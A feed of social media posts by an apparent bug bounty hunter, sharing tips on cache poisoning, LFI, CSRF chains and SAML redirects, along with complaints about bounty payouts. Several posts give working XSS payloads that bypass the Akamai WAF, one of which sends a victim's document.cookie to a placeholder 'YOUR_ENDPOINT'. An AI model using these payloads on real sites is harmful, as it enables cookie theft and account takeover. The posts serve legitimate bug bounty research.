Stored XSS via cache poisoning 🧪
the Akamai WAF really annoyed me, but the craft of this payload defeated it :
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
#bugbountytips
#BugBounty
#Hacking
instead of heading towards what everyone else is looking for explore a vulnerability that you like
dive deep into the topic, invest, set up a small lab and look for specific cases or recurring vulnerabilities in any software
It might take a while but your efforts will be worth it
research => interesting discovery => pattern recovery + template creation => axiom + nuclei => mass scan (BB programs) => double check and report
Ramadan mubaarak to all Muslims, take advantage of this month to get back to essential things!
#BugBounty
1. Identify a URL param allowing a potential LFI
2. FUZZ the param value (GPT can help to create a custom list)
3. Find a new file/page via LFI
4. FUZZ looking for URL params reflected on this newly discovered file
(...) ⬇️
#bugbountytips
#Hacking
the cooking continues wal hamduliLlah, here are some of the dishes
the "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted
#BugBounty
1. Self-XSS on the personal information side
2. Search for a CSRF on the vector in question but nothing on the web app side
3. Discovery of an old endpoint on the mobile app vulnerable to CSRF
(...) ⬇️
#bugbountytip
#BugBounty
moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses
so, while waiting for the next articles on my recent 0d:
WAF as a weapon and DOS as a bullet
#infosecurity
Yay, I was awarded a $2,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
the BB is also that, sometimes we come across self-respecting companies that make sure to be fair and it's frankly pleasant
The hunt was good tonight al hamduliLlah
If during a cache poisoning attempt the X-Http-Method-Override header is taken into account by the server (and the response cached) take the time to test all HTTP verbs, you might have some interesting behaviors
#bugbountytips
#BugBounty
Be careful when testing for cache poisoning, it is rare but sometimes URL parameters are not included in the cache key.
This means that even if you add a parameter to poison the cache, the param will not act as a cache buster (...)
⬇️
#bugbountytips
Yay, I was awarded a $1050 + $500 bounty on
@Hacker0x01
!
beyond exposing the amounts of these two not exceptional bounties, it has been two times in a row -diff programs- that I have almost seen my bounty halved
so “move on” yea but not too quickly either
The javascript code sometimes contains treasures, read it!
Developers sometimes provide certain URL parameters during development that they abandon during production.
When this is the case it is rarely properly sanitized
#BugBounty
#bugbountytips
a first for me on
@immunefi
!
"soon" an article on a little research that I did, allowing me to find more than 60 vulnerable assets (for the moment)
#BugBounty
#Hacking
Take a look at my new write-up: "DOS via cache poisoning" covering some of my findings. 🧪
I briefly explain how a cache works and how this vulnerability is possible, good reading!
#bugbountytips
#bugbountytip
#bugbounty
#infosec
bug bounty mafia ep. 2342952:
from a $2500 to a $750 bounty and always the same fairy tales to justify themselves;
beyond exposing my case and seeking justice by tagging the entire H1 team in my post, when can we expect a stricter system for companies?
#BugBounty
we are a for profit company that generates a lot of money and we invite you to our private VDP program so you can work for us for free, so, happy? (please say yes)
I clearly indicated in my settings that I am not a volunteer, curious to know how they managed to get through
hey
@jobertabma
,
@scarybeasts
useful feature: be notified when the original report of a duplicate is resolved (or when adding/decreasing rep points indirectly)
this isn't the first time that one of my dup reports is still valid after the original report has been resolved... ⬇️
small battles to bypass WAFs are always a pleasure
by the way if someone needs help and wants to collaborate, Akam
@i
bypass (XSS) available
#BugBounty
#infosecurity
the cooking continues wal hamduliLlah, here are some of the dishes
the "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted
#BugBounty
I have access to an AEM via path trans & after a long time digging nothing juicy
The interesting endpoints require changing the http verb which is impossible for me->path trans via serv-side param poll
An AEM expert to inspire me before I abandon this vector forever?
#bugbounty
10.12.22 - Submission
11.12.22 - Internal disc. with the sec team
23.01.23 - Start of mediation
20.02.23 - Needs more info (=Vulnerability patched by the Alibaba team and therefore not reproductible)
15.08.23 - Resolved (without bounty of course)
#BugBounty
#hackerone
#infosec
🏴☠️New write-up on a recently found vulnerability, titled: "A web cache deception chained to a CSRF, the recipe"
Don't hesitate to take a look!
#bugbountytip
#bugbountytips
#Hacking
Some sites do not have the same ftrs/technos depending on the region chosen, this is often aimed at providing a more relevant UX adapted to the specific needs of each region
And it may be that a fix is deployed in some countries but not others
/fr/ fix
/sg/ still
#bugbountytips
For those who asked me how to make a payload - bypassing the Akamai WAF - for a blind XSS, or simply to retrieve cookies to its endpoint :
"><input autofocus nope="%26quot;x%26quot;"onfocus="frames.location='YOUR_ENDPOINT?c='+Reflect.get(document,'coo'+'kie')">
#bugbountytips
Context: XSS to account takeover.
"For any reflected XSS, Confidentiality is always None"
What do you think? Is he right? If yes, why?
#bugbounty
#infosec
#hackerone
Lumberjack Payload 🪓
After a long battle (blacklisted keywords, prohibited parentheses, different types of simple apostrophes..) I got it.
->
#javascript
:whatever you want() in the URL hash
-> frames["loca"+"tion"]=frames.location.hash[1]+....
#bugbountytips
#BugBountytip
⬇️
Hi
@Hacker0x01
, If a company decides to literally ghost a researcher and fix the bug a few months later, is that really possible? Customers are king okay, but at this point?
Not a single message from the security team in 6 months despite two mediations 🫠
#BugBounty
#hackerone
I was able to exploit similar behavior via a GET req this time:
the value of several URL params were returned by the server then all put together in a cookie
by dividing a payload normally blocked by the WAF into 3 and placing each part as a value of a param (...)
#bugbounty
moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses
so, while waiting for the next articles on my recent 0d:
WAF as a weapon and DOS as a bullet
#infosecurity
Latest episode is live and this week we've got a tool drop!
@Rhynorater
put together a script and Caido extension which coordinates with
@DanielMiessler
's Fabric to help automate BBP report writing.
Also, lots of reporting tips! Enjoy!
Thank you for the gifts
@Hacker0x01
Currently at +780 rep points on
#HackerOne
having only worked on paid programs, free work for for-profit companies not being my thing.
Nothing crazy, have to keep trying hard hoping that the continuity will be exponential -in shaa Allah-☝🏼
If you manage to cache - via any extension - a 404 response (error being caused by the addition of your extension), make sure that no confidential information is present in the source code when you are connected to an account. 🧪
#bugbountytips
#bugbountytip
#infosec
Little
#bugbountytip
HTLMi in an email template to ATO?
When we have a code inj in an email template we report it as HTMLi since it is not possible to execute JS in the different email clients
Sometimes a link is provided in the email to view it in the browser>JS triggering>XSS
hey
@Ice3man543
,
description/CVE is incorrect here, the vuln linked to the invoke header is not linked to CVE-2023-46298 [1], I did not get a CVE as explained in my research
if you create an exclusive template for the invoke header remember to put my article [2] in ref, thanks!
it's okay not to master a subject, but in this case you have to ask and not act hastily
it's like saying about an RCE POC, that the "id" command is not sensitive and that it is therefore not a vuln..
we have an adage which says: "science (knowledge) before words and actions!"
Same thing without user interaction :
"><input autofocus nope="%26quot;x%26quot;"onfocus="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
when I search for vulnerabilities via techniques and/or discoveries on a particular subject my duplicate rate is 0%
the beaten path has its limits, the competition is tough, don't be a skid, easy money doesn't exist -almost-
enjoy and be curious (sry for the linkedin aura)
Craft, XSS and ATO
After some research, I came across a POST request in my proxy which -for some reasons- caught my attention. The server was returning data in JSON format, I retrieved the parameters passed via POST then transmitted them via a GET request (...)
#bugbountytips
Improper config of SAML allows the use of the relayState param to redirect the user to an endpoint owned by the attckr
The redirect is done via a POST by which it returns the SAML resp after auth
The value of the SAML resp can then be exchanged for an access_token
#bugbountytip
⬇️
nice bypass, without parentheses or template strings, I had fun!
if anyone needs help and wants to collaborate, Cloudfl
@re
bypass (XSS) available
(Akam
@i
still available)
#bugbounty
#Hacking
small battles to bypass WAFs are always a pleasure
by the way if someone needs help and wants to collaborate, Akam
@i
bypass (XSS) available
#BugBounty
#infosecurity
lately I've seen quite a few posts from hunters blocked by WAFs asking for help to transform their HTMLi into XSS
guys, it's my guilty pleasure don't hesitate
WAFs tend to let me pass
always available for this kind of little
#bugbounty
collabs